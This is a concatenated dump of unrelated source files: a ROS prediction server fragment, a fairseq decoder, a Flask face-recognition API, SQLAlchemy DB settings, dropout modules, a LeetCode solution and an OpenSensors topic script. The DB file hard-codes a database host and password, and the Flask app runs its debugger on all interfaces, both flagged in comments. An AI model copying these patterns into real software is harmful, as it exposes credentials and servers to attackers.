        if self.is_fremen_active:
            for i in self.models:
                print i
                i._create_fremen_models()
        return True

    def fremen_restart_cb(self, msg):
        """
        This function creates the models when the fremenserver is started
        """
        if msg.data:
            rospy.logwarn("FREMENSERVER restart detected will generate new models now")
            for i in self.models:
                i._create_fremen_models()
                print i.name, i.order
            self.is_fremen_active=True
            #self.create_models()

    def rebuild_all_models_cb(self, req):
        """
        This function creates the models when the service is called
        """
        resp=False
        if self.is_fremen_active:
            for i in self.models:
                i._create_fremen_models()
                print i.name, i.order
            resp=True
            str_msg="All Done"
        else:
            resp=False
            str_msg="No fremenserver"
        return resp, str_msg

    def predict_cb(self, req):
        """Service cb: predict model outcomes at the requested epochs."""
        epochs =[]
        for i in req.epochs:
            epochs.append(i)
        for i in self.models:
            if i.name == req.model_name:
                predictions = i._predict_outcome(epochs)
        return epochs, predictions

    def predict_entropy_cb(self, req):
        """Service cb: predict model entropies at the requested epochs."""
        epochs =[]
        for i in req.epochs:
            epochs.append(i)
        for i in self.models:
            if i.name == req.model_name:
                predictions = i._predict_entropy(epochs)
        return epochs, predictions

    def predict_order_cb(self, req):
        """Service cb: predict outcomes using an explicit FreMEn order."""
        epochs =[]
        for i in req.epochs:
            epochs.append(i)
        for i in self.models:
            if i.name == req.model_name:
                predictions = i._predict_outcome(epochs, order=req.order)
        return epochs, predictions

    def predict_entropy_order_cb(self, req):
        """Service cb: predict entropies using an explicit FreMEn order."""
        epochs =[]
        for i in req.epochs:
            epochs.append(i)
        for i in self.models:
            if i.name == req.model_name:
                predictions = i._predict_entropy(epochs, order=req.order)
        return epochs, predictions

    def create_models(self, data):
        """Instantiate a TModels object per definition dict and fill each
        one with its states from MongoDB."""
        print data
        for i in data:
            #print i
            val=TModels(i['model']['name'])
            val._set_props_from_dict(i['model'])
            self.models.append(val)
        for i in self.models:
            print "-------------------------------------"
            print i
            self.set_model_states(i)

    def set_model_states(self, model):
        """Query the model's MongoDB collection with its stored query and
        feed every matching document into the model."""
        db=self.mongo_client[model.db]
        collection=db[model.collection]
        query = json.loads(model.query)
        available = collection.find(query)
        if available:
            for i in available:
                model._add_entry(i)
        else:
            model._set_unknown(True)

    def graph_model_build_cb(self, req):
        """Service cb: trigger graph-model construction for a model."""
        self.graph_model_construction(req)
        return "Done"

    def graph_model_construction(self, req):
        """Build a graph model for req.model_name over hourly epochs,
        sweeping FreMEn orders from req.from_val to req.until_val."""
        for i in self.models:
            if req.model_name == i.name:
                preds=[]
                graph = graph_model(i.name)
                # Hourly epochs spanning the model's observed time range
                ordeps = np.arange(min(i.epochs), max(i.epochs), 3600)
                ordrange = np.arange(req.from_val, req.until_val+1, req.increment)
                for j in ordrange.tolist():
                    preds.append(i._predict_outcome(ordeps.tolist(), order=j))
                graph.graph_model_construction(i.epochs, i.states, preds, ordeps.tolist())

    def _on_node_shutdown(self):
        """Close the MongoDB connection when the ROS node shuts down."""
        rospy.loginfo("Shutting Down ...")
        self.mongo_client.close()
        rospy.loginfo("Done... Bye")
if __name__ == '__main__':
    # Optional -yaml_defs argument points at a model-definitions file;
    # without it the server starts empty and models are added later via
    # the /frongo/add_model_defs service.
    parser = argparse.ArgumentParser()
    parser.add_argument("-yaml_defs", help="The yaml file", type=str)
    args, unknown = parser.parse_known_args() # Necessary due to roslaunch injecting rubbish arguments
    if args.yaml_defs:
        data = load_yaml(args.yaml_defs)
    else:
        print "starting empty"
        data=''
    rospy.init_node('door_prediction')
    server = frongo(data)
|
[
"marc@hanheide.net"
] |
marc@hanheide.net
|
8caf0ac2f29b470bd287edb3a60880ed31f2327f
|
2e682fd72e3feaa70e3f7bf2a3b83c50d783ec02
|
/PyTorch/built-in/nlp/Fairseq_Transformer_wmt18_for_PyTorch/fairseq/models/transformer/transformer_decoder_aug.py
|
c5e710179443705f47c9aaba02927d8d43d80fff
|
[
"MIT",
"GPL-1.0-or-later",
"Apache-2.0",
"BSD-2-Clause",
"BSD-3-Clause",
"LicenseRef-scancode-generic-cla",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
Ascend/ModelZoo-PyTorch
|
4c89414b9e2582cef9926d4670108a090c839d2d
|
92acc188d3a0f634de58463b6676e70df83ef808
|
refs/heads/master
| 2023-07-19T12:40:00.512853
| 2023-07-17T02:48:18
| 2023-07-17T02:48:18
| 483,502,469
| 23
| 6
|
Apache-2.0
| 2022-10-15T09:29:12
| 2022-04-20T04:11:18
|
Python
|
UTF-8
|
Python
| false
| false
| 14,744
|
py
|
# Copyright (c) Facebook, Inc. and its affiliates.
#
# This source code is licensed under the MIT license found in the
# LICENSE file in the root directory of this source tree.
from typing import Any, Dict, List, Optional
import torch
import torch.nn as nn
from torch import Tensor
from fairseq import utils
from fairseq.distributed import fsdp_wrap
from fairseq.models.transformer import TransformerConfig
from fairseq.models.transformer.transformer_decoder import TransformerDecoderBase
from fairseq.modules import (
LayerDropModuleList,
SinusoidalPositionalEmbedding,
transformer_layer_aug,
)
from fairseq.modules.checkpoint_activations import checkpoint_wrapper
class AugTransformerDecoderBase(TransformerDecoderBase):
    """
    Transformer decoder augmented with an additional cross-attention. Each layer
    is a :class:`AugTransformerDecoderLayerBase`.

    Args:
        cfg (argparse.Namespace): parsed command-line arguments
        dictionary (~fairseq.data.Dictionary): decoding dictionary
        embed_tokens (torch.nn.Embedding): output embedding
        encoder_attn_merge_type (str, optional): the way to combine outputs from
            two cross-attention modules. If "sequential" is set, two cross-attention
            modules are stacked sequentially. If "parallel" is set, they are processed
            in parallel and combined before feeding it to FFN (default: sequential).
        dropnet_ratio (float, optional): a probability to drop each cross-attention
            module during training (default: 0.0).
    """

    def __init__(
        self,
        cfg,
        dictionary,
        embed_tokens,
        output_projection=None,
        encoder_attn_merge_type="sequential",
        dropnet_ratio=0.0,
    ):
        super().__init__(
            cfg,
            dictionary,
            embed_tokens,
            no_encoder_attn=False,
            output_projection=output_projection,
        )
        # assert cfg.cross_self_attention
        self.cross_self_attention = cfg.cross_self_attention
        # Replace the layer stack built by the parent __init__ with
        # augmented layers that carry the second cross-attention.
        if self.decoder_layerdrop > 0.0:
            self.layers = LayerDropModuleList(p=self.decoder_layerdrop)
        else:
            self.layers = nn.ModuleList([])
        self.layers.extend(
            [
                self.build_decoder_layer(cfg, encoder_attn_merge_type, dropnet_ratio)
                for _ in range(cfg.decoder.layers)
            ]
        )

    def build_decoder_layer(
        self,
        cfg,
        encoder_attn_merge_type="sequential",
        dropnet_ratio=0,
    ):
        # Build one augmented decoder layer, optionally wrapped for
        # activation checkpointing and FSDP.
        layer = transformer_layer_aug.AugTransformerDecoderLayerBase(
            cfg,
            no_encoder_attn=False,
            encoder_attn_merge_type=encoder_attn_merge_type,
            dropnet_ratio=dropnet_ratio,
        )
        checkpoint = cfg.checkpoint_activations
        if checkpoint:
            offload_to_cpu = cfg.offload_activations
            layer = checkpoint_wrapper(layer, offload_to_cpu=offload_to_cpu)
        # if we are checkpointing, enforce that FSDP always wraps the
        # checkpointed layer, regardless of layer size
        min_params_to_wrap = cfg.min_params_to_wrap if not checkpoint else 0
        layer = fsdp_wrap(layer, min_num_params=min_params_to_wrap)
        return layer

    def forward(
        self,
        prev_output_tokens,
        encoder_out: Optional[Dict[str, List[Tensor]]] = None,
        encoder_out_aug: Optional[Dict[str, List[Tensor]]] = None,
        incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
        features_only: bool = False,
        full_context_alignment: bool = False,
        alignment_layer: Optional[int] = None,
        alignment_heads: Optional[int] = None,
        src_lengths: Optional[Any] = None,
        return_all_hiddens: bool = False,
    ):
        """
        Args:
            prev_output_tokens (LongTensor): previous decoder outputs of shape
                `(batch, tgt_len)`, for teacher forcing
            encoder_out (optional): output from the encoder, used for
                encoder-side attention, should be of size T x B x C
            incremental_state (dict): dictionary used for storing state during
                :ref:`Incremental decoding`
            features_only (bool, optional): only return features without
                applying output layer (default: False).
            full_context_alignment (bool, optional): don't apply
                auto-regressive mask to self-attention (default: False).

        Returns:
            tuple:
                - the decoder's output of shape `(batch, tgt_len, vocab)`
                - a dictionary with any model-specific outputs
        """
        x, extra = self.extract_features(
            prev_output_tokens,
            encoder_out=encoder_out,
            encoder_out_aug=encoder_out_aug,
            incremental_state=incremental_state,
            full_context_alignment=full_context_alignment,
            alignment_layer=alignment_layer,
            alignment_heads=alignment_heads,
        )
        if not features_only:
            x = self.output_layer(x)
        return x, extra

    def extract_features(
        self,
        prev_output_tokens,
        encoder_out: Optional[Dict[str, List[Tensor]]],
        encoder_out_aug: Optional[Dict[str, List[Tensor]]],
        incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
        full_context_alignment: bool = False,
        alignment_layer: Optional[int] = None,
        alignment_heads: Optional[int] = None,
    ):
        # Thin indirection kept for torchscript compatibility — see the
        # note string below.
        return self.extract_features_scriptable(
            prev_output_tokens,
            encoder_out,
            encoder_out_aug,
            incremental_state,
            full_context_alignment,
            alignment_layer,
            alignment_heads,
        )

    """
    A scriptable subclass of this class has an extract_features method and calls
    super().extract_features, but super() is not supported in torchscript. A copy of
    this function is made to be used in the subclass instead.
    """

    def extract_features_scriptable(
        self,
        prev_output_tokens,
        encoder_out: Optional[Dict[str, List[Tensor]]],
        encoder_out_aug: Optional[Dict[str, List[Tensor]]],
        incremental_state: Optional[Dict[str, Dict[str, Optional[Tensor]]]] = None,
        full_context_alignment: bool = False,
        alignment_layer: Optional[int] = None,
        alignment_heads: Optional[int] = None,
    ):
        """
        Similar to *forward* but only return features.

        Includes several features from "Jointly Learning to Align and
        Translate with Transformer Models" (Garg et al., EMNLP 2019).

        Args:
            full_context_alignment (bool, optional): don't apply
                auto-regressive mask to self-attention (default: False).
            alignment_layer (int, optional): return mean alignment over
                heads at this layer (default: last layer).
            alignment_heads (int, optional): only average alignment over
                this many heads (default: all heads).

        Returns:
            tuple:
                - the decoder's features of shape `(batch, tgt_len, embed_dim)`
                - a dictionary with any model-specific outputs
        """
        bs, slen = prev_output_tokens.size()
        if alignment_layer is None:
            alignment_layer = self.num_layers - 1

        # Unpack primary encoder output and its padding mask (if any)
        enc: Optional[Tensor] = None
        padding_mask: Optional[Tensor] = None
        if encoder_out is not None and len(encoder_out["encoder_out"]) > 0:
            enc = encoder_out["encoder_out"][0]
        if encoder_out is not None and len(encoder_out["encoder_padding_mask"]) > 0:
            padding_mask = encoder_out["encoder_padding_mask"][0]

        # Unpack the auxiliary (augmented) encoder output the same way
        enc_aug: Optional[Tensor] = None
        padding_mask_aug: Optional[Tensor] = None
        if encoder_out_aug is not None and len(encoder_out_aug["encoder_out"]) > 0:
            enc_aug = encoder_out_aug["encoder_out"][0]
        if (
            encoder_out_aug is not None
            and len(encoder_out_aug["encoder_padding_mask"]) > 0
        ):
            padding_mask_aug = encoder_out_aug["encoder_padding_mask"][0]

        # embed positions
        positions = None
        if self.embed_positions is not None:
            positions = self.embed_positions(
                prev_output_tokens, incremental_state=incremental_state
            )

        # Incremental decoding: only the newest token needs processing
        if incremental_state is not None:
            prev_output_tokens = prev_output_tokens[:, -1:]
            if positions is not None:
                positions = positions[:, -1:]

        # Prevent torchscript exporting issue for dynamic quant embedding
        prev_output_tokens = prev_output_tokens.contiguous()

        # embed tokens and positions
        x = self.embed_scale * self.embed_tokens(prev_output_tokens)

        if self.quant_noise is not None:
            x = self.quant_noise(x)

        if self.project_in_dim is not None:
            x = self.project_in_dim(x)

        if positions is not None:
            x += positions

        if self.layernorm_embedding is not None:
            x = self.layernorm_embedding(x)

        x = self.dropout_module(x)

        # B x T x C -> T x B x C
        x = x.transpose(0, 1)

        self_attn_padding_mask: Optional[Tensor] = None
        if self.cross_self_attention or prev_output_tokens.eq(self.padding_idx).any():
            self_attn_padding_mask = prev_output_tokens.eq(self.padding_idx)

        # decoder layers
        attn: Optional[Tensor] = None
        attn_aug: Optional[Tensor] = None
        inner_states: List[Optional[Tensor]] = [x]
        for idx, layer in enumerate(self.layers):
            # Future mask only when decoding left-to-right without cache
            if incremental_state is None and not full_context_alignment:
                self_attn_mask = self.buffered_future_mask(x)
            else:
                self_attn_mask = None

            x, layer_attn, layer_attn_aug, _ = layer(
                x,
                enc,
                padding_mask,
                enc_aug,
                padding_mask_aug,
                incremental_state,
                self_attn_mask=self_attn_mask,
                self_attn_padding_mask=self_attn_padding_mask,
                need_attn=bool((idx == alignment_layer)),
                need_head_weights=bool((idx == alignment_layer)),
            )
            inner_states.append(x)
            if layer_attn is not None and idx == alignment_layer:
                attn = layer_attn.float().to(x)
            if layer_attn_aug is not None and idx == alignment_layer:
                attn_aug = layer_attn_aug.float().to(x)

        if attn is not None:
            if alignment_heads is not None:
                attn = attn[:alignment_heads]
            # average probabilities over heads
            attn = attn.mean(dim=0)

        if attn_aug is not None:
            if alignment_heads is not None:
                attn_aug = attn_aug[:alignment_heads]
            # average probabilities over heads
            attn_aug = attn_aug.mean(dim=0)

        if self.layer_norm is not None:
            x = self.layer_norm(x)

        # T x B x C -> B x T x C
        x = x.transpose(0, 1)

        if self.project_out_dim is not None:
            x = self.project_out_dim(x)

        return x, {"attn": [attn], "attn_aug": [attn_aug], "inner_states": inner_states}

    def upgrade_state_dict_named(self, state_dict, name):
        """Upgrade a (possibly old) state dict for new versions of fairseq."""
        # Sinusoidal embeddings are deterministic: drop stored weights in
        # favor of a placeholder tensor.
        if isinstance(self.embed_positions, SinusoidalPositionalEmbedding):
            weights_key = "{}.embed_positions.weights".format(name)
            if weights_key in state_dict:
                del state_dict[weights_key]
            state_dict[
                "{}.embed_positions._float_tensor".format(name)
            ] = torch.FloatTensor(1)

        # Migrate legacy output-embedding keys to output_projection.weight
        if f"{name}.output_projection.weight" not in state_dict:
            if self.share_input_output_embed:
                embed_out_key = f"{name}.embed_tokens.weight"
            else:
                embed_out_key = f"{name}.embed_out"
            if embed_out_key in state_dict:
                state_dict[f"{name}.output_projection.weight"] = state_dict[
                    embed_out_key
                ]
                if not self.share_input_output_embed:
                    del state_dict[embed_out_key]

        for i in range(self.num_layers):
            # update layer norms
            layer_norm_map = {
                "0": "self_attn_layer_norm",
                "1": "encoder_attn_layer_norm",
                "2": "encoder_attn_layer_norm2",
                "3": "final_layer_norm",
            }
            for old, new in layer_norm_map.items():
                for m in ("weight", "bias"):
                    k = "{}.layers.{}.layer_norms.{}.{}".format(name, i, old, m)
                    if k in state_dict:
                        state_dict[
                            "{}.layers.{}.{}.{}".format(name, i, new, m)
                        ] = state_dict[k]
                        del state_dict[k]

        version_key = "{}.version".format(name)
        if utils.item(state_dict.get(version_key, torch.Tensor([1]))[0]) <= 2:
            # earlier checkpoints did not normalize after the stack of layers
            self.layer_norm = None
            self.normalize = False
            state_dict[version_key] = torch.Tensor([1])

        return state_dict
class AugTransformerDecoder(AugTransformerDecoderBase):
    """Namespace-args adapter for :class:`AugTransformerDecoderBase`.

    Translates a legacy argparse ``args`` namespace into a
    ``TransformerConfig`` before delegating every operation to the
    dataclass-config base class.
    """

    def __init__(
        self,
        args,
        dictionary,
        embed_tokens,
        output_projection=None,
    ):
        self.args = args
        cfg = TransformerConfig.from_namespace(args)
        merge_type = getattr(
            args, "synthesizer_augmented_cross_attention_merge_type", "sequential"
        )
        super().__init__(
            cfg,
            dictionary,
            embed_tokens,
            no_encoder_attn=False,
            output_projection=output_projection,
            encoder_attn_merge_type=merge_type,
            dropnet_ratio=getattr(args, "dropnet_ratio", 0),
        )

    def build_output_projection(self, args, dictionary, embed_tokens):
        """Build the vocabulary projection from a namespace-style ``args``."""
        cfg = TransformerConfig.from_namespace(args)
        super().build_output_projection(cfg, dictionary, embed_tokens)

    def build_decoder_layer(
        self,
        args,
        encoder_attn_merge_type="sequential",
        dropnet_ratio=0,
    ):
        """Build a single decoder layer from a namespace-style ``args``."""
        cfg = TransformerConfig.from_namespace(args)
        return super().build_decoder_layer(
            cfg,
            no_encoder_attn=False,
            encoder_attn_merge_type=encoder_attn_merge_type,
            dropnet_ratio=dropnet_ratio,
        )
|
[
"chensida@huawei.com"
] |
chensida@huawei.com
|
8770327fd46000407e804baae2a0d53f472ed0ca
|
2a1bffbab39918e0ee9e7dfa08b7d9120ed25f21
|
/server.py
|
cca85f7111e3ad8bc23be7df027f11383ea642f6
|
[] |
no_license
|
sumitu27/Face_detection
|
bccdd283e4b2732b70ce6fd08a291c3027db754b
|
9d0c05c3c23618779abe56a5281bc6b8f310798c
|
refs/heads/master
| 2021-06-28T14:27:34.000430
| 2020-09-24T18:40:34
| 2020-09-24T18:40:34
| 152,997,679
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,769
|
py
|
from flask import Flask, render_template, request
from flask import jsonify
from flask_cors import CORS
import os
from add_face_in_collection import add_faces_to_collection
from s3_bucket import store_image_into_s3_bucket
from show_list_of_faces import list_faces_in_collection
from detect_faces_from_image import detect_faces_in_image
from collection_for_face import create_collection, delete_collection
# Flask application instance; CORS is enabled for all routes so a browser
# front-end served from a different origin can call this API.
app = Flask(__name__)
CORS(app)
@app.route('/')
def upload_file():
    """Serve the landing page containing the upload form."""
    page = render_template('index.html')
    return page
@app.route('/dev/add_face', methods=['GET', 'POST'])
def add_face_in_collection():
    """Save an uploaded image locally, push it to S3, and index the face.

    Expects a multipart upload under the ``file`` field. Returns a plain-text
    confirmation containing the stored file's base name (without extension).
    """
    f = request.files["file"]
    # Strip any directory components from the client-supplied filename so a
    # crafted name like "../../x.png" cannot escape the upload directory.
    base_name = os.path.basename(f.filename)
    upload_file_name = os.path.join("./added_face", base_name)
    f.save(upload_file_name)
    file_name, _ext = os.path.splitext(base_name)
    store_image_into_s3_bucket(upload_file_name, file_name, base_name)
    add_faces_to_collection('my-personal-data-sumit', base_name, "family_collection")
    return "Face Added Successfully :::: " + str(file_name)
@app.route('/dev/list_of_faces', methods=['GET', 'POST'])
def list_of_faces():
    """List the faces registered in the family collection.

    Returns the helper's message string directly on failure, otherwise a
    JSON response with the collection contents.
    """
    result = list_faces_in_collection('family_collection')
    return result if isinstance(result, str) else jsonify(result)
@app.route('/dev/detect_faces', methods=['GET', 'POST'])
def detect_faces():
    """Save an uploaded image, push it to S3, and match it against indexed faces.

    Returns JSON of the form ``{"Person Identified": <helper response>}``.
    """
    f = request.files["file"]
    # Strip directory components from the client-supplied filename to prevent
    # path traversal outside the upload directory.
    base_name = os.path.basename(f.filename)
    upload_file_name = os.path.join("./detect_faces", base_name)
    f.save(upload_file_name)
    file_name, _ext = os.path.splitext(base_name)
    store_image_into_s3_bucket(upload_file_name, file_name, base_name)
    return_response = detect_faces_in_image(
        base_name, 'my-personal-data-sumit', upload_file_name
    )
    return jsonify({"Person Identified": return_response})
@app.route('/dev/create_face_collection', methods=['GET', 'POST'])
def create_face_collection():
    """Create the backing face collection; report success or the raw status."""
    status = create_collection('family_collection')
    print('Status code: ' + str(status))
    if str(status).strip() == "200":
        return "Face Collection Created Successfully"
    return str(status)
@app.route('/dev/delete_face_collection', methods=['GET', 'POST'])
def delete_face_collection():
    """Delete the backing face collection; report success or the raw status."""
    status = delete_collection('family_collection')
    print('Status code: ' + str(status))
    if str(status).strip() == "200":
        return "Face Collection Deleted Successfully"
    return str(status)
if __name__ == '__main__':
    # NOTE(review): debug=True combined with host 0.0.0.0 exposes the Werkzeug
    # interactive debugger to the whole network — disable debug outside local dev.
    app.run(debug=True, port="5005", host="0.0.0.0")
|
[
"sumitu27@gmail.com"
] |
sumitu27@gmail.com
|
48ba43c4ade9ef9ed87f8471fa199dac6bc3a6a9
|
9436682c3d21fbe2737724ce24f2d7c79b5f7598
|
/transformerLM_org/locked_dropout.py
|
36ae543e5a82d44252662117c793fe796904083e
|
[
"BSD-3-Clause"
] |
permissive
|
grandeelee/codeswitch-challenge-LM
|
5f2cea2db29b02e54d4b36f69b85a0e3b4689442
|
d44f922d25df34a5905917b0351a7bbf3cccf22f
|
refs/heads/master
| 2022-08-12T05:43:45.836690
| 2019-12-20T01:39:41
| 2019-12-20T01:39:41
| 210,730,930
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 879
|
py
|
import torch.nn as nn
import torch
class LockedDropout(nn.Module):
    """Variational ("locked") dropout.

    Samples one Bernoulli mask of shape ``(x.size(0), 1, x.size(2))`` and
    broadcasts it along dim 1, so the same units are dropped at every position
    of that axis. Kept entries are rescaled by ``1 / (1 - p)``. Identity when
    not training or when the rate is unset/zero.
    """

    def __init__(self, dropout=None):
        super(LockedDropout, self).__init__()
        self.dropout = dropout

    def forward(self, x):
        # No-op outside training or when dropout is None/0.
        if not self.training or not self.dropout:
            return x
        keep = 1 - self.dropout
        # Single mask shared along dim 1 via broadcasting.
        noise = x.data.new_empty(x.size(0), 1, x.size(2)).bernoulli_(keep)
        return x * (noise / keep).expand_as(x)
class MaskDropout(nn.Module):
    """Drop entire last-axis positions of a ``[batch, head, seq, seq]`` tensor.

    One Bernoulli mask per (batch, key-position) pair is broadcast over the
    head and query axes, so the same tokens are masked everywhere. Kept
    entries are rescaled by ``1 / (1 - p / 2)`` (note: not ``1 / (1 - p)``).
    Identity when not training or when the rate is unset/zero.
    """

    def __init__(self, dropout=None):
        super(MaskDropout, self).__init__()
        self.dropout = dropout

    def forward(self, x):
        # No-op outside training or when dropout is None/0.
        if not self.training or not self.dropout:
            return x
        keep_prob = 1 - self.dropout
        # One value per last-axis position, shared across dims 1 and 2.
        noise = x.data.new_empty(x.size(0), 1, 1, x.size(3)).bernoulli_(keep_prob)
        scale = 1 - self.dropout / 2
        return x * (noise / scale).expand_as(x)
|
[
"grandee.lee@gmail.com"
] |
grandee.lee@gmail.com
|
ef89edf72b6fef1c644f641a5e5131067c3652a6
|
62f08c50bb3ed5e025565bd9813602a7d5d486b0
|
/mod/databases/db.py
|
06b7645dfe593ae2854cd63a7ff17ca3e3ad4b85
|
[] |
no_license
|
flyingzhao/youin-tornado
|
c7b97ade9fc1f17e7302e09948e5b589cb80770d
|
e09ecea1ddd7cdd75ed03f5ad0d6923a70a31fb8
|
refs/heads/master
| 2021-01-14T10:39:45.163617
| 2015-10-08T14:51:40
| 2015-10-08T14:51:40
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 541
|
py
|
# -*- coding: utf-8 -*-
# Database connection settings and the shared SQLAlchemy engine/Base.
# NOTE(review): credentials are hard-coded in source control — move them to
# environment variables or a config file kept outside the repository.
DB_HOST = '115.28.27.150'
# DB_HOST = '127.0.0.1'
DB_USER = 'youyinuser'
# DB_USER = 'root'
DB_PWD = 'youyin2015'
# DB_PWD = '084358'
DB_NAME = 'youyin'
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
Base = declarative_base()  # declarative base class for all ORM models
# Shared engine: pooled (100 connections), recycled every 10 s, no SQL echo.
engine = create_engine('mysql://%s:%s@%s/%s?charset=utf8' %
                       (DB_USER, DB_PWD, DB_HOST, DB_NAME),
                       encoding='utf-8', echo=False,
                       pool_size=100, pool_recycle=10)
|
[
"1948448114@qq.com"
] |
1948448114@qq.com
|
d404e395bc7af7f6fff3d1e90df9cae2080d961d
|
84c1e780a349c4bae2d6cf4c1da72889d5222797
|
/Python/Sets/Add Element/add_element.py
|
734881c62f2cf52476f8c83a4d58493999e2141a
|
[
"MIT"
] |
permissive
|
brianchiang-tw/HackerRank
|
18e31583b10cf2189adac97e7cb2997d46790bcd
|
02a30a0033b881206fa15b8d6b4ef99b2dc420c8
|
refs/heads/master
| 2020-09-23T23:18:08.253868
| 2020-02-13T14:16:22
| 2020-02-13T14:16:22
| 225,612,833
| 2
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 493
|
py
|
# Enter your code here. Read input from STDIN. Print output to STDOUT
from typing import Set
def add_element_to_set(set_a: Set, new_element: str) -> None:
    """Insert *new_element* into *set_a* in place; duplicates are no-ops."""
    set_a |= {new_element}
    return
def num_of_unique_element(set_a: Set) -> int:
    """Return how many distinct elements *set_a* holds."""
    return len(set_a)
if __name__ == '__main__':
    # Read N lines from STDIN, collect them into a set, and print how many
    # distinct values were seen (HackerRank "Add Element" driver).
    N = int( input() )
    set_a = set()
    for _ in range(N):
        input_str = input()
        add_element_to_set(set_a, input_str)
    print( num_of_unique_element( set_a ) )
|
[
"brianchiang1988@icloud.com"
] |
brianchiang1988@icloud.com
|
587fc2d1ad57042f6ea786215c71dfcfc01612ab
|
cd8f7ecd20c58ce1ae0fe3840f7c7ee961aa5819
|
/SubdomainVisitCount.py
|
64404a58e7a5e1cf86da8c6f08587ad1aafb6ab4
|
[
"Apache-2.0"
] |
permissive
|
sugia/leetcode
|
9b0f2a3521b088f8f7e5633c2c6c17c76d33dcaf
|
6facec2a54d1d9f133f420c9bce1d1043f57ebc6
|
refs/heads/master
| 2021-06-05T07:20:04.099488
| 2021-02-24T07:24:50
| 2021-02-24T07:24:50
| 29,124,136
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,578
|
py
|
'''
A website domain like "discuss.leetcode.com" consists of various subdomains. At the top level, we have "com", at the next level, we have "leetcode.com", and at the lowest level, "discuss.leetcode.com". When we visit a domain like "discuss.leetcode.com", we will also visit the parent domains "leetcode.com" and "com" implicitly.
Now, call a "count-paired domain" to be a count (representing the number of visits this domain received), followed by a space, followed by the address. An example of a count-paired domain might be "9001 discuss.leetcode.com".
We are given a list cpdomains of count-paired domains. We would like a list of count-paired domains, (in the same format as the input, and in any order), that explicitly counts the number of visits to each subdomain.
Example 1:
Input:
["9001 discuss.leetcode.com"]
Output:
["9001 discuss.leetcode.com", "9001 leetcode.com", "9001 com"]
Explanation:
We only have one website domain: "discuss.leetcode.com". As discussed above, the subdomain "leetcode.com" and "com" will also be visited. So they will all be visited 9001 times.
Example 2:
Input:
["900 google.mail.com", "50 yahoo.com", "1 intel.mail.com", "5 wiki.org"]
Output:
["901 mail.com","50 yahoo.com","900 google.mail.com","5 wiki.org","5 org","1 intel.mail.com","951 com"]
Explanation:
We will visit "google.mail.com" 900 times, "yahoo.com" 50 times, "intel.mail.com" once and "wiki.org" 5 times. For the subdomains, we will visit "mail.com" 900 + 1 = 901 times, "com" 900 + 50 + 1 = 951 times, and "org" 5 times.
Notes:
The length of cpdomains will not exceed 100.
The length of each domain name will not exceed 100.
Each address will have either 1 or 2 "." characters.
The input count in any count-paired domain will not exceed 10000.
The answer output can be returned in any order.
'''
class Solution(object):
    def subdomainVisits(self, cpdomains):
        """
        Expand count-paired domains into per-(sub)domain visit counts.

        :type cpdomains: List[str]  # e.g. ["9001 discuss.leetcode.com"]
        :rtype: List[str]           # "count domain" strings, any order
        """
        domain_to_count = {}
        for line in cpdomains:
            count_str, address = line.split(' ')
            count = int(count_str)
            components = address.split('.')
            # Every dotted suffix of the address is an implicitly visited domain.
            # range (not Python-2-only xrange) so this runs on Python 3.
            for i in range(len(components)):
                domain = '.'.join(components[i:])
                # Single lookup via .get instead of a membership test + index.
                domain_to_count[domain] = domain_to_count.get(domain, 0) + count
        return [str(cnt) + ' ' + dom for dom, cnt in domain_to_count.items()]
|
[
"noreply@github.com"
] |
sugia.noreply@github.com
|
dc8c18eee4aeb04dc3b4635e978d09cc22174af1
|
7c169c2e3b06bb821418589cb72006986cb15a33
|
/src/scs_osio/topic.py
|
2423a30c4ab8d17d048108049677d8a855845216
|
[
"MIT"
] |
permissive
|
seoss/scs_osio
|
35c6548c15e420e17b189c9d9d61fbcb06f94d0e
|
c6f4bca93e556db5c403f2ff05ae06a9add42a5d
|
refs/heads/master
| 2020-04-04T20:15:23.226017
| 2018-07-10T08:00:14
| 2018-07-10T08:00:14
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,956
|
py
|
#!/usr/bin/env python3
"""
Created on 16 Feb 2017
@author: Bruno Beloff (bruno.beloff@southcoastscience.com)
Requires APIAuth document.
workflow:
Use osio_publication instead.
command line example:
./topic.py /orgs/south-coast-science-dev/test/1/status -n "test" -d "test of status" -s 28 -v
"""
import sys
from scs_core.data.json import JSONify
from scs_core.osio.client.api_auth import APIAuth
from scs_core.osio.data.topic import Topic
from scs_core.osio.data.topic_info import TopicInfo
from scs_core.osio.manager.topic_manager import TopicManager
from scs_host.client.http_client import HTTPClient
from scs_host.sys.host import Host
from scs_osio.cmd.cmd_topic import CmdTopic
# --------------------------------------------------------------------------------------------------------------------
if __name__ == '__main__':
    # ----------------------------------------------------------------------------------------------------------------
    # cmd...
    cmd = CmdTopic()
    if not cmd.is_valid():
        cmd.print_help(sys.stderr)
        exit(2)
    if cmd.verbose:
        print("topic: %s" % cmd, file=sys.stderr)
        sys.stderr.flush()
    # ----------------------------------------------------------------------------------------------------------------
    # resources...
    # APIAuth: credentials stored on the host; required before any API call.
    api_auth = APIAuth.load(Host)
    if api_auth is None:
        print("topic: APIAuth not available.", file=sys.stderr)
        exit(1)
    # manager...
    manager = TopicManager(HTTPClient(), api_auth.api_key)
    # check for existing registration — None when the topic path is not yet known.
    topic = manager.find(cmd.path)
    # ----------------------------------------------------------------------------------------------------------------
    # run...
    if cmd.set():
        if topic:
            # Update path: merge provided fields over the existing topic.
            if cmd.schema_id is not None:
                print("topic: It is not possible to change the schema ID of an existing topic.", file=sys.stderr)
                cmd.print_help(sys.stderr)
                exit(1)
            name = topic.name if cmd.name is None else cmd.name
            description = topic.description if cmd.description is None else cmd.description
            info = TopicInfo(TopicInfo.FORMAT_JSON) if topic.info is None else topic.info
            # update Topic, then re-fetch so the printed record reflects the server state.
            updated = Topic(None, name, description, topic.is_public, info, None, None)
            manager.update(topic.path, updated)
            topic = manager.find(topic.path)
        else:
            # Create path: every field must be supplied on the command line.
            if not cmd.is_complete():
                print("topic: All fields required for topic creation must be provided.", file=sys.stderr)
                cmd.print_help(sys.stderr)
                exit(1)
